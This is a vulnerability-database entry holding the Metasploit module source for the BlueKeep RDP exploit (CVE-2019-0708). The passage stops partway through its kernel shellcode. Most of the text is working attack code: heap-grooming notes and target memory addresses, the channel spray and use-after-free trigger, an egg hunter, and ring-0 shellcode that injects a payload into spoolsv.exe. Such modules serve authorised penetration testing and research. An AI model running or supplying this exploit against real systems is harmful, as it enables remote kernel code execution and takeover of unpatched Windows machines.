2008 R2 are the only currently supported targets. Windows 7 SP1 should be exploitable in its default configuration, assuming your target selection is correctly matched to the system's memory layout. HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam *needs* to be set to 0 for exploitation to succeed against Windows Server 2008 R2. This is a non-standard configuration for normal servers, and the target will crash if the aforementioned Registry key is not set! If the target is crashing regardless, you will likely need to determine the non-paged pool base in kernel memory and set it as the GROOMBASE option.\n", "published": "2019-09-19T11:05:08", "type": "metasploit", "title": "CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0708"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/RDP/CVE_2019_0708_BLUEKEEP_RCE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# Exploitation and Caveats from zerosum0x0:\n#\n# 1. Register with channel MS_T120 (and others such as RDPDR/RDPSND) nominally.\n# 2. Perform a full RDP handshake, I like to wait for RDPDR handshake too (code in the .py)\n# 3. Free MS_T120 with the DisconnectProviderIndication message to MS_T120.\n# 4. RDP has chunked messages, so we use this to groom.\n# a. Chunked messaging ONLY works properly when sent to RDPSND/MS_T120.\n# b. However, on 7+, MS_T120 will not work and you have to use RDPSND.\n# i. RDPSND only works when\n# HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam = 0\n# ii. This registry key is not a default setting for server 2008 R2.\n# We should use alternate groom channels or at least detect the\n# channel in advance.\n# 5. Use chunked grooming to fit new data in the freed channel, account for\n# the allocation header size (like 0x38 I think?). At offset 0x100? is where\n# the \"call [rax]\" gadget will get its pointer from.\n# a. The NonPagedPool (NPP) starts at a fixed address on XP-7\n# i. Hot-swap memory is another problem because, with certain VMWare and\n# Hyper-V setups, the OS allocates a buncha PTE stuff before the NPP\n# start. This can be anywhere from 100 mb to gigabytes of offset\n# before the NPP start.\n# b. Set offset 0x100 to NPPStart+SizeOfGroomInMB\n# c. Groom chunk the shellcode, at *(NPPStart+SizeOfGroomInMB) you need\n# [NPPStart+SizeOfGroomInMB+8...payload]... because \"call [rax]\" is an\n# indirect call\n# d. We are limited to 0x400 payloads by channel chunk max size. My\n# current shellcode is a twin shellcode with eggfinders. I spam the\n# kernel payload and user payload, and if user payload is called first it\n# will egghunt for the kernel payload.\n# 6. After channel hole is filled and the NPP is spammed up with shellcode,\n# trigger the free by closing the socket.\n#\n# TODO:\n# * Detect OS specifics / obtain memory leak to determine NPP start address.\n# * Write the XP/2003 portions grooming MS_T120.\n# * Detect if RDPSND grooming is working or not?\n# * Expand channels besides RDPSND/MS_T120 for grooming.\n# See https://unit42.paloaltonetworks.com/exploitation-of-windows-cve-2019-0708-bluekeep-three-ways-to-write-data-into-the-kernel-with-rdp-pdu/\n#\n# https://github.com/0xeb-bp/bluekeep .. this repo has code for grooming\n# MS_T120 on XP... should be same process as the RDPSND\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ManualRanking\n\n USERMODE_EGG = 0xb00dac0fefe31337\n KERNELMODE_EGG = 0xb00dac0fefe42069\n\n CHUNK_SIZE = 0x400\n HEADER_SIZE = 0x48\n\n include Msf::Exploit::Remote::RDP\n include Msf::Exploit::Remote::CheckModule\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free',\n 'Description' => %q(\n The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120,\n allowing a malformed Disconnect Provider Indication message to cause use-after-free.\n With a controllable data/size remote nonpaged pool spray, an indirect call gadget of\n the freed channel is used to achieve arbitrary code execution.\n\n Windows 7 SP1 and Windows Server 2008 R2 are the only currently supported targets.\n\n Windows 7 SP1 should be exploitable in its default configuration, assuming your target\n selection is correctly matched to the system's memory layout.\n\n HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam\n *needs* to be set to 0 for exploitation to succeed against Windows Server 2008 R2.\n This is a non-standard configuration for normal servers, and the target will crash if\n the aforementioned Registry key is not set!\n\n If the target is crashing regardless, you will likely need to determine the non-paged\n pool base in kernel memory and set it as the GROOMBASE option.\n ),\n 'Author' =>\n [\n 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0 - Original exploit\n 'Ryan Hanson', # @ryHanson - Original exploit\n 'OJ Reeves <oj@beyondbinary.io>', # @TheColonial - Metasploit module\n 'Brent Cook <bcook@rapid7.com>', # @busterbcook - Assembly whisperer\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2019-0708'],\n ['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'],\n ['URL', 'https://zerosum0x0.blogspot.com/2019/11/fixing-remote-windows-kernel-payloads-meltdown.html']\n ],\n 'DefaultOptions' =>\n {\n 'RDP_CLIENT_NAME' => 'ethdev',\n 'EXITFUNC' => 'thread',\n 'CheckModule' => 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep',\n 'WfsDelay' => 5\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => CHUNK_SIZE - HEADER_SIZE,\n 'EncoderType' => Msf::Encoder::Type::Raw,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [\n 'Automatic targeting via fingerprinting',\n {\n 'Arch' => [ARCH_X64],\n 'FingerprintOnly' => true\n },\n ],\n #\n #\n # Windows 2008 R2 requires the following registry change from default:\n #\n # [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\rdpwd]\n # \"fDisableCam\"=dword:00000000\n #\n [\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8003800000,\n 'GROOMSIZE' => 100\n }\n ],\n [\n # This works with Virtualbox 6\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8002407000\n }\n ],\n [\n # This address works on VMWare 14\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8030c00000\n }\n ],\n [\n # This address works on VMWare 15\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8018C00000\n }\n ],\n [\n # This address works on VMWare 15.1\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8018c08000\n }\n ],\n [\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8102407000\n }\n ],\n [\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8018c08000\n }\n ],\n [\n 'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'GROOMBASE' => 0xfffffa8004428000\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2019-05-14',\n 'Notes' =>\n {\n 'AKA' => ['Bluekeep']\n }\n ))\n\n register_advanced_options(\n [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptInt.new('GROOMSIZE', [true, 'Size of the groom in MB', 250]),\n OptEnum.new('GROOMCHANNEL', [true, 'Channel to use for grooming', 'RDPSND', ['RDPSND', 'MS_T120']]),\n OptInt.new('GROOMCHANNELCOUNT', [true, 'Number of channels to groom', 1]),\n OptFloat.new('GROOMDELAY', [false, 'Delay in seconds between sending 1 MB of groom packets', 0])\n ]\n )\n end\n\n def exploit\n unless check == CheckCode::Vulnerable || datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')\n end\n\n if target['FingerprintOnly']\n fail_with(Msf::Module::Failure::BadConfig, 'Set the most appropriate target manually. If you are targeting 2008, make sure fDisableCam=0 !')\n end\n\n begin\n rdp_connect\n rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError\n fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')\n end\n\n is_rdp, server_selected_proto = rdp_check_protocol\n unless is_rdp\n fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')\n end\n\n # We don't currently support NLA in the mixin or the exploit. However, if we have valid creds, NLA shouldn't stop us\n # from exploiting the target.\n if [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include?(server_selected_proto)\n fail_with(Msf::Module::Failure::BadConfig, 'Server requires NLA (CredSSP) security which mitigates this vulnerability.')\n end\n\n chans = [\n ['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP],\n [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\n [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\n ['MS_XXX0', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX1', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX2', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX3', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX4', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_XXX5', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ]\n\n @mst120_chan_id = 1004 + chans.length - 1\n\n unless rdp_negotiate_security(chans, server_selected_proto)\n fail_with(Msf::Module::Failure::Unknown, 'Negotiation of security failed.')\n end\n\n rdp_establish_session\n\n rdp_dispatch_loop\n end\n\nprivate\n\n # This function is invoked when the PAKID_CORE_CLIENTID_CONFIRM message is\n # received on a channel, and this is when we need to kick off our exploit.\n def rdp_on_core_client_id_confirm(pkt, user, chan_id, flags, data)\n # We have to do the default behaviour first.\n super(pkt, user, chan_id, flags, data)\n\n groom_size = datastore['GROOMSIZE']\n pool_addr = target['GROOMBASE'] + (CHUNK_SIZE * 1024 * groom_size)\n groom_chan_count = datastore['GROOMCHANNELCOUNT']\n\n payloads = create_payloads(pool_addr)\n\n print_status(\"Using CHUNK grooming strategy. Size #{groom_size}MB, target address 0x#{pool_addr.to_s(16)}, Channel count #{groom_chan_count}.\")\n\n target_channel_id = chan_id + 1\n\n spray_buffer = create_exploit_channel_buffer(pool_addr)\n spray_channel = rdp_create_channel_msg(self.rdp_user_id, target_channel_id, spray_buffer, 0, 0xFFFFFFF)\n free_trigger = spray_channel * 20 + create_free_trigger(self.rdp_user_id, @mst120_chan_id) + spray_channel * 80\n\n # if the exploit is cancelled during the free, target computer will explode\n print_warning(\"<---------------- | Entering Danger Zone | ---------------->\")\n\n print_status(\"Surfing channels ...\")\n rdp_send(spray_channel * 1024)\n rdp_send(free_trigger)\n\n chan_surf_size = 0x421\n spray_packets = (chan_surf_size / spray_channel.length) + [1, chan_surf_size % spray_channel.length].min\n chan_surf_packet = spray_channel * spray_packets\n chan_surf_count = chan_surf_size / spray_packets\n\n chan_surf_count.times do\n rdp_send(chan_surf_packet)\n end\n\n print_status(\"Lobbing eggs ...\")\n\n groom_mb = groom_size * 1024 / payloads.length\n\n groom_start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC)\n\n groom_mb.times do |current_groom_count|\n tpkts = ''\n for c in 0..groom_chan_count\n payloads.each do |p|\n tpkts += rdp_create_channel_msg(self.rdp_user_id, target_channel_id + c, p, 0, 0xFFFFFFF)\n end\n end\n rdp_send(tpkts)\n\n # tasks we do every 1 MB\n if current_groom_count % (1024 / payloads.length) == 0\n\n # adding mouse move events keeps the connection alive\n # (this handles a groom duration > 30 seconds, such as over Internet/VPN)\n rdp_move_mouse\n\n # simulate slow connection if GROOMDELAY is set\n if datastore['GROOMDELAY'] && datastore['GROOMDELAY'] > 0\n sleep(datastore['GROOMDELAY'])\n end\n\n groom_current_time = Process.clock_gettime(Process::CLOCK_MONOTONIC)\n groom_elapsed_time = groom_current_time - groom_start_time\n groom_elapsed_str = \"%02d:%02d:%02d\" % [groom_elapsed_time / 3600,\n groom_elapsed_time / 60%60,\n groom_elapsed_time % 60]\n\n groom_mb_sent = current_groom_count / (1024 / payloads.length) + 1\n vprint_status(\"Sent #{groom_mb_sent}/#{groom_size} MB. (Time elapsed: #{groom_elapsed_str})\")\n end\n end\n\n # Terminating and disconnecting forces the USE\n print_status(\"Forcing the USE of FREE'd object ...\")\n\n # target is groomed, the early cancellation dangers are complete\n print_warning(\"<---------------- | Leaving Danger Zone | ---------------->\")\n rdp_terminate\n rdp_disconnect\n end\n\n # Helper function to create the kernel mode payload and the usermode payload with\n # the egg hunter prefix.\n def create_payloads(pool_address)\n begin\n [kernel_mode_payload, user_mode_payload].map { |p|\n [\n pool_address + HEADER_SIZE + 0x10, # indirect call gadget, over this pointer + egg\n p\n ].pack('<Qa*').ljust(CHUNK_SIZE - HEADER_SIZE, \"\\x00\")\n }\n rescue => ex\n print_error(\"#{ex.backtrace.join(\"\\n\")}: #{ex.message} (#{ex.class})\")\n end\n end\n\n def assemble_with_fixups(asm)\n # Rewrite all instructions of form 'lea reg, [rel label]' as relative\n # offsets for the instruction pointer, since metasm's 'ModRM' parser does\n # not grok that syntax.\n lea_rel = /lea+\\s(?<dest>\\w{2,3}),*\\s\\[rel+\\s(?<label>[a-zA-Z_].*)\\]/\n asm.gsub!(lea_rel) do |match|\n match = \"lea #{$1}, [rip + #{$2}]\"\n end\n\n # metasm encodes all rep instructions as repnz\n # https://github.com/jjyg/metasm/pull/40\n asm.gsub!(/rep+\\smovsb/, 'db 0xf3, 0xa4')\n\n encoded = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encoded\n\n # Fixup above rewritten instructions with the relative label offsets\n encoded.reloc.each do |offset, reloc|\n target = reloc.target.to_s\n if encoded.export.key?(target)\n # Note: this assumes the address we're fixing up is at the end of the\n # instruction. This holds for 'lea' but if there are other fixups\n # later, this might need to change to account for specific instruction\n # encodings\n if reloc.type == :i32\n instr_offset = offset + 4\n elsif reloc.type == :i16\n instr_offset = offset + 2\n end\n encoded.fixup(target => encoded.export[target] - instr_offset)\n else\n raise \"Unknown symbol '#{target}' while resolving relative offsets\"\n end\n end\n encoded.fill\n encoded.data\n end\n\n # The user mode payload has two parts. The first is an egg hunter that searches for\n # the kernel mode payload. The second part is the actual payload that's invoked in\n # user land (ie. it's injected into spoolsrv.exe). We need to spray both the kernel\n # and user mode payloads around the heap in different packets because we don't have\n # enough space to put them both in the same chunk. Given that code exec can result in\n # landing on the user land payload, the egg is used to go to a kernel payload.\n def user_mode_payload\n\n asm = %Q^\n_start:\n lea rcx, [rel _start]\n mov r8, 0x#{KERNELMODE_EGG.to_s(16)}\n_egg_loop:\n sub rcx, 0x#{CHUNK_SIZE.to_s(16)}\n sub rax, 0x#{CHUNK_SIZE.to_s(16)}\n mov rdx, [rcx - 8]\n cmp rdx, r8\n jnz _egg_loop\n jmp rcx\n ^\n egg_loop = assemble_with_fixups(asm)\n\n # The USERMODE_EGG is required at the start as well, because the exploit code\n # assumes the tag is there, and jumps over it to find the shellcode.\n [\n USERMODE_EGG,\n egg_loop,\n USERMODE_EGG,\n payload.raw\n ].pack('<Qa*<Qa*')\n end\n\n def kernel_mode_payload\n\n # Windows x64 kernel shellcode from ring 0 to ring 3 by sleepya\n #\n # This shellcode was written originally for eternalblue exploits\n # eternalblue_exploit7.py and eternalblue_exploit8.py\n #\n # Idea for Ring 0 to Ring 3 via APC from Sean Dillon (@zerosum0x0)\n #\n # Note:\n # - The userland shellcode is run in a new thread of system process.\n # If userland shellcode causes any exception, the system process get killed.\n # - On idle target with multiple core processors, the hijacked system call\n # might take a while (> 5 minutes) to get called because the system\n # call may be called on other processors.\n # - The shellcode does not allocate shadow stack if possible for minimal shellcode size.\n # This is ok because some Windows functions do not require a shadow stack.\n # - Compiling shellcode with specific Windows version macro, corrupted buffer will be freed.\n # Note: the Windows 8 version macros are removed below\n # - The userland payload MUST be appened to this shellcode.\n #\n # References:\n # - http://www.geoffchappell.com/studies/windows/km/index.htm (structures info)\n # - https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c\n\n data_kapc_offset = 0x30\n\n data_hal_original_syscall_shadow_common_offset_offset = 0x20\n data_hal_fake_syscall_spinlock_offset = 0x10\n\n data_nt_kernel_addr_offset = 0x8\n data_origin_syscall_offset = 0\n data_peb_addr_offset = -0x10\n data_queueing_kapc_offset = -0x8\n hal_heap_storage = 0xffffffffffd04100\n\n # These hashes are not the same as the ones used by the\n # Block API so they have to be hard-coded.\n createthread_hash = 0x835e515e\n keinitializeapc_hash = 0x6d195cc4\n keinsertqueueapc_hash = 0xafcc4634\n psgetcurrentprocess_hash = 0xdbf47c78\n psgetprocessid_hash = 0x170114e1\n psgetprocessimagefilename_hash = 0x77645f3f\n psgetprocesspeb_hash = 0xb818b848\n psgetthreadteb_hash = 0xcef84c3e\n spoolsv_exe_hash = 0x3ee083d8\n zwallocatevirtualmemory_hash = 0x576e99ea\n\n asm = %Q^\nshellcode_start:\n ; egg tag\n nop\n nop\n nop\n nop\n\nsetup_syscall_shadow_hook:\n ; IRQL is PASSIVE_LEVEL when got code execution\n ;int 0x3\n\n mov rbp, #{hal_heap_storage}\n\n ; allow interrupts while executing shellcode\n sti\n call r3_to_r0_start\n cli\n\n ;--------------------- HACK crappy thread cleanup --------------------\n ; This code is effectively the same as the epilogue of the function that calls\n ; the vulnerable function in the kernel, with a tweak or two.\n ; TODO: make the lock not suck!!\n mov rax, qword [gs:0x188]\n add word [rax+0x1C4], 1 ; KeGetCurrentThread()->KernelApcDisable++\n lea r11, [rsp+0b8h]\n xor eax, eax\n mov rbx, [r11+30h]\n mov rbp, [r11+40h]\n mov rsi, [r11+48h]\n mov rsp, r11\n pop r15\n pop r14\n pop r13\n pop r12\n pop rdi\n ret\n\nr3_to_r0_start:\n ; save used non-volatile registers\n push r15\n push r14\n push rdi\n push rsi\n push rbx\n push rax ; align stack by 0x10\n\n ;======================================\n ; find nt kernel address\n ;======================================\n mov r15, qword [gs:0x38] ; get IdtBase of KPCR\n mov r15, qword [r15 + 0x4] ; get ISR address\n shr r15, 0xc ; strip to page size\n shl r15, 0xc\n\n_x64_find_nt_walk_page:\n sub r15, 0x1000 ; walk along page size\n cmp word [r15], 0x5a4d ; 'MZ' header\n jne _x64_find_nt_walk_page\n\n ; save nt address for using in KernelApcRoutine\n mov [rbp+#{data_nt_kernel_addr_offset}], r15\n\n ;======================================\n ; get current EPROCESS and ETHREAD\n ;======================================\n mov r14, qword [gs:0x188] ; get _ETHREAD pointer from KPCR\n mov edi, #{psgetcurrentprocess_hash}\n call win_api_direct\n xchg rcx, rax ; rcx = EPROCESS\n\n ; r15 : nt kernel address\n ; r14 : ETHREAD\n ; rcx : EPROCESS\n\n ;======================================\n ; find offset of EPROCESS.ImageFilename\n ;======================================\n mov edi, #{psgetprocessimagefilename_hash}\n call get_proc_addr\n mov eax, dword [rax+3] ; get offset from code (offset of ImageFilename is always > 0x7f)\n mov ebx, eax ; ebx = offset of EPROCESS.ImageFilename\n\n\n ;======================================\n ; find offset of EPROCESS.ThreadListHead\n ;======================================\n ; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)\n ; if offset of ImageFilename is more than 0x400, current is (Win8+)\n\n cmp eax, 0x400 ; eax is still an offset of EPROCESS.ImageFilename\n jb _find_eprocess_threadlist_offset_win7\n add eax, 0x10\n_find_eprocess_threadlist_offset_win7:\n lea rdx, [rax+0x28] ; edx = offset of EPROCESS.ThreadListHead\n\n ;======================================\n ; find offset of ETHREAD.ThreadListEntry\n ;======================================\n\n lea r8, [rcx+rdx] ; r8 = address of EPROCESS.ThreadListHead\n mov r9, r8\n\n ; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700\n_find_ethread_threadlist_offset_loop:\n mov r9, qword [r9]\n\n cmp r8, r9 ; check end of list\n je _insert_queue_apc_done ; not found !!!\n\n ; if (r9 - r14 < 0x700) found\n mov rax, r9\n sub rax, r14\n cmp rax, 0x700\n ja _find_ethread_threadlist_offset_loop\n sub r14, r9 ; r14 = -(offset of ETHREAD.ThreadListEntry)\n\n\n ;======================================\n ; find offset of EPROCESS.ActiveProcessLinks\n ;======================================\n mov edi, #{psgetprocessid_hash}\n call get_proc_addr\n mov edi, dword [rax+3] ; get offset from code (offset of UniqueProcessId is always > 0x7f)\n add edi, 8 ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)\n\n\n ;======================================\n ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock\n ;======================================\n ; check process name\n\n\n xor eax, eax ; HACK to exit earlier if process not found\n\n_find_target_process_loop:\n lea rsi, [rcx+rbx]\n\n push rax\n call calc_hash\n cmp eax, #{spoolsv_exe_hash} ; \"spoolsv.exe\"\n pop rax\n jz found_target_process\n\n;---------- HACK PROCESS NOT FOUND start -----------\n inc rax\n cmp rax, 0x300 ; HACK not found!\n jne _next_find_target_process\n xor ecx, ecx\n ; clear queueing kapc flag, allow other hijacked system call to run shellcode\n mov byte [rbp+#{data_queueing_kapc_offset}], cl\n\n jmp _r3_to_r0_done\n\n;---------- HACK PROCESS NOT FOUND end -----------\n\n_next_find_target_process:\n ; next process\n mov rcx, [rcx+rdi]\n sub rcx, rdi\n jmp _find_target_process_loop\n\n\nfound_target_process:\n ; The allocation for userland payload will be in KernelApcRoutine.\n ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()\n\n ;======================================\n ; save process PEB for finding CreateThread address in kernel KAPC routine\n ;======================================\n mov edi, #{psgetprocesspeb_hash}\n ; rcx is EPROCESS. no need to set it.\n call win_api_direct\n mov [rbp+#{data_peb_addr_offset}], rax\n\n\n ;======================================\n ; iterate ThreadList until KeInsertQueueApc() success\n ;======================================\n ; r15 = nt\n ; r14 = -(offset of ETHREAD.ThreadListEntry)\n ; rcx = EPROCESS\n ; edx = offset of EPROCESS.ThreadListHead\n\n\n lea rsi, [rcx + rdx] ; rsi = ThreadListHead address\n mov rbx, rsi ; use rbx for iterating thread\n\n ; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.\n ; Moreover, alertable thread need to be waiting state which is more difficult to check.\n ; try queueing APC then check KAPC member is more reliable.\n\n_insert_queue_apc_loop:\n ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front\n mov rbx, [rbx+8]\n\n cmp rsi, rbx\n je _insert_queue_apc_loop ; skip list head\n\n ; find start of ETHREAD address\n ; set it to rdx to be used for KeInitializeApc() argument too\n lea rdx, [rbx + r14] ; ETHREAD\n\n ; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer.\n ; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL.\n ; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer.\n ; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL.\n ; Teb member is next to Queue member.\n mov edi, #{psgetthreadteb_hash}\n call get_proc_addr\n mov eax, dword [rax+3] ; get offset from code (offset of Teb is always > 0x7f)\n cmp qword [rdx+rax-8], 0 ; KTHREAD.Queue MUST not be NULL\n je _insert_queue_apc_loop\n\n ; KeInitializeApc(PKAPC,\n ; PKTHREAD,\n ; KAPC_ENVIRONMENT = OriginalApcEnvironment (0),\n ; PKKERNEL_ROUTINE = kernel_apc_routine,\n ; PKRUNDOWN_ROUTINE = NULL,\n ; PKNORMAL_ROUTINE = userland_shellcode,\n ; KPROCESSOR_MODE = UserMode (1),\n ; PVOID Context);\n lea rcx, [rbp+#{data_kapc_offset}] ; PAKC\n xor r8, r8 ; OriginalApcEnvironment\n lea r9, [rel kernel_kapc_routine] ; KernelApcRoutine\n push rbp ; context\n push 1 ; UserMode\n push rbp ; userland shellcode (MUST NOT be NULL)\n push r8 ; NULL\n sub rsp, 0x20 ; shadow stack\n mov edi, #{keinitializeapc_hash}\n call win_api_direct\n ; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later\n\n ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);\n ; SystemArgument1 is second argument in usermode code (rdx)\n ; SystemArgument2 is third argument in usermode code (r8)\n lea rcx, [rbp+#{data_kapc_offset}]\n ;xor edx, edx ; no need to set it here\n ;xor r8, r8 ; no need to set it here\n xor r9, r9\n mov edi, #{keinsertqueueapc_hash}\n call win_api_direct\n add rsp, 0x40\n ; if insertion failed, try next thread\n test eax, eax\n jz _insert_queue_apc_loop\n\n mov rax, [rbp+#{data_kapc_offset}+0x10] ; get KAPC.ApcListEntry\n ; EPROCESS pointer 8 bytes\n ; InProgressFlags 1 byte\n ; KernelApcPending 1 byte\n ; if success, UserApcPending MUST be 1\n cmp byte [rax+0x1a], 1\n je _insert_queue_apc_done\n\n ; manual remove list without lock\n mov [rax], rax\n mov [rax+8], rax\n jmp _insert_queue_apc_loop\n\n_insert_queue_apc_done:\n ; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.\n\n_r3_to_r0_done:\n pop rax\n pop rbx\n pop rsi\n pop rdi\n pop r14\n pop r15\n ret\n\n;========================================================================\n; Call function in specific module\n;\n; All function arguments are passed as calling normal function with extra register arguments\n; Extra Arguments: r15 = module pointer\n; edi = hash of target function name\n;========================================================================\nwin_api_direct:\n call get_proc_addr\n jmp rax\n\n\n;========================================================================\n; Get function address in specific module\n;\n; Arguments: r15 = module pointer\n; edi = hash of target function name\n; Return: eax = offset\n;========================================================================\nget_proc_addr:\n ; Save registers\n push rbx\n push rcx\n push rsi ; for using calc_hash\n\n ; use rax to find EAT\n mov eax, dword [r15+60] ; Get PE header e_lfanew\n mov eax, dword [r15+rax+136] ; Get export tables RVA\n\n add rax, r15\n push rax ; save EAT\n\n mov ecx, dword [rax+24] ; NumberOfFunctions\n mov ebx, dword [rax+32] ; FunctionNames\n add rbx, r15\n\n_get_proc_addr_get_next_func:\n ; When we reach the start of the EAT (we search backwards), we hang or crash\n dec ecx ; decrement NumberOfFunctions\n mov esi, dword [rbx+rcx*4] ; Get rva of next module name\n add rsi, r15 ; Add the modules base address\n\n call calc_hash\n\n cmp eax, edi ; Compare the hashes\n jnz _get_proc_addr_get_next_func ; try the next function\n\n_get_proc_addr_finish:\n pop rax ; restore EAT\n mov ebx, dword [rax+36]\n add rbx, r15 ; ordinate table virtual address\n mov cx, word [rbx+rcx*2] ; desired functions ordinal\n mov ebx, dword [rax+28] ; Get the function addresses table rva\n add rbx, r15 ; Add the modules base address\n mov eax, dword [rbx+rcx*4] ; Get the desired functions RVA\n add rax, r15 ; Add the modules base address to get the functions actual VA\n\n pop rsi\n pop rcx\n pop rbx\n ret\n\n;========================================================================\n; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.\n;\n; Argument: rsi = string to hash\n; Clobber: rsi\n; Return: eax = hash\n;========================================================================\ncalc_hash:\n push rdx\n xor eax, eax\n cdq\n_calc_hash_loop:\n lodsb ; Read in the next byte of the ASCII string\n ror edx, 13 ; Rotate right our hash value\n add edx, eax ; Add the next byte of the string\n test eax, eax ; Stop when found NULL\n jne _calc_hash_loop\n xchg edx, eax\n pop rdx\n ret\n\n\n; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.\n; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().\n; Moreover, there is no lock when calling KernelApcRoutine.\n; So KernelApcRoutine can simply lower the IRQL by setting cr8 register.\n;\n; VOID KernelApcRoutine(\n; IN PKAPC Apc,\n; IN PKNORMAL_ROUTINE *NormalRoutine,\n; IN PVOID *NormalContext,\n; IN PVOID *SystemArgument1,\n; IN PVOID *SystemArgument2)\nkernel_kapc_routine:\n push rbp\n push rbx\n push rdi\n push rsi\n push r15\n\n mov 